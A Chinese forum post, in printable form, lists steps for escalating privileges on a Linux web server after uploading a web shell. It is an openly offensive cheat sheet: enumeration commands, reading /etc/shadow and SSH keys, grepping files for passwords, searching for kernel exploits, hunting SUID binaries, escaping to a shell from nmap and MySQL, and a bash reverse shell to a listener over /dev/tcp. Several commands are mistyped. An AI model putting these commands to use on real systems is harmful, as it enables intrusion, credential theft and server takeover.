标题:
网站上传了Shell后准备提权要做的工作(Linux系统)
[打印本页]
作者:
jack9
时间:
26-11-2020 16:46
标题:
网站上传了Shell后准备提权要做的工作(Linux系统)
1. System/Yser info: uname -a, env, whoami, history, pwd
2. Who else has logged in? who, w, last
3. Are you in the Sudo file? sudo -l, cat /sudoers
4. Other super users? grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'
5. Network info: ifconfig -a, netstat -antup, lsof -i
6. check: ps aux, ps -ef
7. List version all: dpkg -l, httpd -V, mysql -V, python -v, ruby -V etc...
8 Determin if any have vulnerabilities: searchsploit
9 Password hashes? cat /etc/shadow
10. Check Task: -ls /la /etc/cron*
11. SSH Keys? -ls -la ~/.ssh/
12. Look for cleartext in any file: find . -type f -maxdepth 4 | xargs grep -i "password"
$ uname -a
$ Linux linux 3.31 Ubuntu .....
$ searchsploit kernel 3.13 linux | sort -n
$ Linux Kenel 3.13 < 3.19 (Ubontu 12.04/14) exploits/linux/local/37292.c
$ find / -perm -u=s -type f 2>/dev/null // list network utilits
$ nmap --interactive
MySQL> ! bash ! ls -l ! shell
Nmap> ! bash !sh
mysql -u 用户名 -p密码 -h 服务器IP地址 -P 服务器端MySQL端口号 -D 数据库名
Reactive Shell:
local: nc -lvp 4445
remote: /bin/bash -i >& /dev/tcp/localIP/4445 0>&1
欢迎光临 建锋网络论坛 (http://forum.kensoft.com/)
Powered by Discuz! 6.0.0